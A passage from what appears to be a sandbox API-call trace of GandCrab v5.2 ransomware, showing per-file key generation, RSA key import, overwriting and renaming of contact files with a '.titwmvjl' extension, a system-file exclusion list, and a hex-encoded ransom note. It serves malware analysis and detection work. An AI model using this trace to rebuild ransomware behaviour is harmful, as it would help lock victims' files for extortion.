dwFreeType=0x8000) returned 1 [0087.150] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.150] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0087.151] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0087.151] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0087.151] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0087.151] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f44c | out: pbBuffer=0x259f44c) returned 1 [0087.151] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.151] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0087.151] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.152] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.152] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0087.153] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.153] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x5035b8) returned 1 [0087.153] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.153] CryptGetKeyParam (in: hKey=0x5035b8, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0087.153] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.153] CryptEncrypt (in: hKey=0x5035b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0087.153] GetLastError () returned 0x0 [0087.154] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.154] CryptDestroyKey (hKey=0x5035b8) returned 1 [0087.154] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.154] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0087.154] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.154] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0087.155] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.155] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x5034f8) returned 1 [0087.155] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.155] CryptGetKeyParam (in: hKey=0x5034f8, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0087.155] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.156] CryptEncrypt (in: hKey=0x5034f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0087.156] GetLastError () returned 0x0 [0087.156] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.156] CryptDestroyKey (hKey=0x5034f8) returned 1 [0087.156] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.156] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0087.156] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0087.156] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0087.157] ReadFile (in: hFile=0x2ac, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f470*=0x496, lpOverlapped=0x0) returned 1 [0087.173] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xfffffb6a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.173] WriteFile (in: hFile=0x2ac, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x496, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f454*=0x496, lpOverlapped=0x0) returned 1 [0087.175] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.175] WriteFile (in: hFile=0x2ac, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f454*=0x21c, lpOverlapped=0x0) returned 1 [0087.177] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.181] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.182] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.182] CloseHandle (hObject=0x2ac) returned 1 [0087.182] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\lulcit amkdfe.contact" (normalized: "c:\\users\\ciihmnxmn6ps\\contacts\\lulcit amkdfe.contact"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\lulcit amkdfe.contact.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\contacts\\lulcit amkdfe.contact.titwmvjl"), dwFlags=0x1) returned 1 [0087.183] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.183] FindNextFileW (in: hFindFile=0x503638, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0087.183] lstrcmpW (lpString1="sikvnb huvuib.contact", lpString2=".") returned 1 [0087.184] lstrcmpW (lpString1="sikvnb huvuib.contact", lpString2="..") returned 1 [0087.184] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\", lpString2="sikvnb huvuib.contact" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\sikvnb huvuib.contact") returned="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\sikvnb huvuib.contact" [0087.184] lstrlenW (lpString=".titwmvjl") returned 9 [0087.184] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\sikvnb huvuib.contact") returned 52 [0087.184] VirtualAlloc (lpAddress=0x0, dwSize=0xa8, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0087.184] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\sikvnb huvuib.contact.titwmvjl") returned 61 [0087.184] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\sikvnb huvuib.contact") returned 52 [0087.184] lstrlenW (lpString=".contact") returned 8 [0087.184] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0087.184] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".contact ") returned 9 [0087.184] lstrcmpiW (lpString1=".contact", lpString2=".titwmvjl") returned -1 [0087.184] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.185] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\sikvnb huvuib.contact") returned 52 [0087.185] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\sikvnb huvuib.contact") returned 52 [0087.185] lstrcmpiW (lpString1="sikvnb huvuib.contact", lpString2="desktop.ini") returned 1 [0087.185] lstrcmpiW (lpString1="sikvnb huvuib.contact", lpString2="autorun.inf") returned 1 [0087.185] lstrcmpiW (lpString1="sikvnb huvuib.contact", lpString2="ntuser.dat") returned 1 [0087.185] lstrcmpiW (lpString1="sikvnb huvuib.contact", lpString2="iconcache.db") returned 1 [0087.185] lstrcmpiW (lpString1="sikvnb huvuib.contact", lpString2="bootsect.bak") returned 1 [0087.185] lstrcmpiW (lpString1="sikvnb huvuib.contact", lpString2="boot.ini") returned 1 [0087.185] lstrcmpiW (lpString1="sikvnb huvuib.contact", lpString2="ntuser.dat.log") returned 1 [0087.185] lstrcmpiW (lpString1="sikvnb huvuib.contact", lpString2="thumbs.db") returned -1 [0087.185] lstrcmpiW (lpString1="sikvnb huvuib.contact", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0087.185] lstrcmpiW (lpString1="sikvnb huvuib.contact", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0087.185] lstrcmpiW (lpString1="sikvnb huvuib.contact", lpString2="KRAB-DECRYPT.html") returned 1 [0087.185] lstrcmpiW (lpString1="sikvnb huvuib.contact", lpString2="CRAB-DECRYPT.html") returned 1 [0087.185] lstrcmpiW (lpString1="sikvnb huvuib.contact", lpString2="KRAB-DECRYPT.txt") returned 1 [0087.185] lstrcmpiW (lpString1="sikvnb huvuib.contact", lpString2="CRAB-DECRYPT.txt") returned 1 [0087.185] lstrcmpiW (lpString1="sikvnb huvuib.contact", lpString2="ntldr") returned 1 [0087.185] lstrcmpiW (lpString1="sikvnb huvuib.contact", lpString2="NTDETECT.COM") returned 1 [0087.185] lstrcmpiW (lpString1="sikvnb huvuib.contact", lpString2="Bootfont.bin") returned 1 [0087.185] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\sikvnb huvuib.contact") returned 52 [0087.185] lstrlenW (lpString=".contact") returned 8 [0087.185] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0087.185] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".contact ") returned 9 [0087.185] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.186] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0087.186] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\sikvnb huvuib.contact" (normalized: "c:\\users\\ciihmnxmn6ps\\contacts\\sikvnb huvuib.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2ac [0087.186] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.186] ReadFile (in: hFile=0x2ac, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f470*=0x21c, lpOverlapped=0x0) returned 1 [0087.188] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.188] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.189] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0087.190] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0087.190] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0087.191] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0087.191] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f42c | out: pbBuffer=0x259f42c) returned 1 [0087.191] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.191] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0087.191] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.191] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.191] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0087.193] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0087.193] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0087.193] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0087.193] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f44c | out: pbBuffer=0x259f44c) returned 1 [0087.193] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.193] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0087.193] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.194] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.194] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0087.195] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.195] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x5033f8) returned 1 [0087.196] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.196] CryptGetKeyParam (in: hKey=0x5033f8, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0087.196] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.196] CryptEncrypt (in: hKey=0x5033f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0087.196] GetLastError () returned 0x0 [0087.196] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.197] CryptDestroyKey (hKey=0x5033f8) returned 1 [0087.197] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.197] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0087.197] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.197] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0087.198] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.199] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x503838) returned 1 [0087.199] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.199] CryptGetKeyParam (in: hKey=0x503838, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0087.199] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.199] CryptEncrypt (in: hKey=0x503838, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0087.199] GetLastError () returned 0x0 [0087.199] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.200] CryptDestroyKey (hKey=0x503838) returned 1 [0087.200] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.200] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0087.200] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0087.200] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0087.200] ReadFile (in: hFile=0x2ac, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f470*=0x51f, lpOverlapped=0x0) returned 1 [0087.216] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xfffffae1, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.216] WriteFile (in: hFile=0x2ac, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x51f, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f454*=0x51f, lpOverlapped=0x0) returned 1 [0087.219] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.219] WriteFile (in: hFile=0x2ac, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f454*=0x21c, lpOverlapped=0x0) returned 1 [0087.221] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.225] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.225] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.225] CloseHandle (hObject=0x2ac) returned 1 [0087.226] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\sikvnb huvuib.contact" (normalized: "c:\\users\\ciihmnxmn6ps\\contacts\\sikvnb huvuib.contact"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\sikvnb huvuib.contact.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\contacts\\sikvnb huvuib.contact.titwmvjl"), dwFlags=0x1) returned 1 [0087.227] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.227] FindNextFileW (in: hFindFile=0x503638, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0087.227] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0087.227] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0087.227] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\TITWMVJL-DECRYPT.txt" [0087.227] lstrlenW (lpString=".titwmvjl") returned 9 [0087.227] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\TITWMVJL-DECRYPT.txt") returned 51 [0087.227] VirtualAlloc (lpAddress=0x0, dwSize=0xa6, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0087.227] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 60 [0087.227] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\TITWMVJL-DECRYPT.txt") returned 51 [0087.227] lstrlenW (lpString=".txt") returned 4 [0087.227] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0087.227] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".txt ") returned 5 [0087.227] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0087.228] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.228] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\TITWMVJL-DECRYPT.txt") returned 51 [0087.228] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\TITWMVJL-DECRYPT.txt") returned 51 [0087.228] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0087.228] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0087.228] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0087.228] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0087.228] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0087.228] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0087.228] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0087.228] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0087.228] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.228] FindNextFileW (in: hFindFile=0x503638, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 0 [0087.228] FindClose (in: hFindFile=0x503638 | out: hFindFile=0x503638) returned 1 [0087.229] CloseHandle (hObject=0x230) returned 1 [0087.229] FindNextFileW (in: hFindFile=0x503678, lpFindFileData=0x259f7b8 | out: lpFindFileData=0x259f7b8) returned 1 [0087.229] lstrcmpW (lpString1="Cookies", lpString2=".") returned 1 [0087.229] lstrcmpW (lpString1="Cookies", lpString2="..") returned 1 [0087.229] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\", lpString2="Cookies" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Cookies") returned="C:\\Users\\CIiHmnxMn6Ps\\Cookies" [0087.229] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Cookies", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Cookies\\") returned="C:\\Users\\CIiHmnxMn6Ps\\Cookies\\" [0087.229] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0087.229] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0087.229] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0087.230] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0087.230] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0087.230] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0087.230] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0087.230] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0087.230] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0087.230] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.230] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0087.230] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Cookies\\\\TITWMVJL-DECRYPT.txt") returned 51 [0087.230] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Cookies\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\cookies\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0087.231] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\